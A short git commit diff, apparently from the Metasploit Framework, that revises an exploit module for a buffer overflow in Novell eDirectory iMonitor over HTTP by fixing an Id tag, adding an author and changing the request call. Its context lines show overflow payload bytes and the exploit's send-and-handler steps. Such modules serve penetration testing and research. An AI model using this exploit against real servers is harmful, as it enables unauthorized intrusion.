Added a fix
git-svn-id: file:///home/svn/framework3/trunk@5509 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
e1a25c1383
commit
2327063569
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
@ -27,7 +27,7 @@ class Exploits::Windows::Http::EDirectory_IMonitor_Overflow < Msf::Exploit::Remo
|
|||
Winter-Smith of NGSSoftware.
|
||||
|
||||
},
|
||||
'Author' => [ 'anonymous' ],
|
||||
'Author' => [ 'anonymous', 'Matt Olney <scacynwrig@yahoo.com>' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
|
@ -72,7 +72,7 @@ class Exploits::Windows::Http::EDirectory_IMonitor_Overflow < Msf::Exploit::Remo
|
|||
uri << "\xe9\xbd\xef\xff\xff"
|
||||
uri << "B" * 0xD0
|
||||
|
||||
res = c.send_request(c.request({ 'uri' => uri }), -1)
|
||||
res = c.send_request(c.request_raw({ 'uri' => uri }))
|
||||
sleep(4)
|
||||
|
||||
handler
|
||||
|
|
Loading…
Reference in New Issue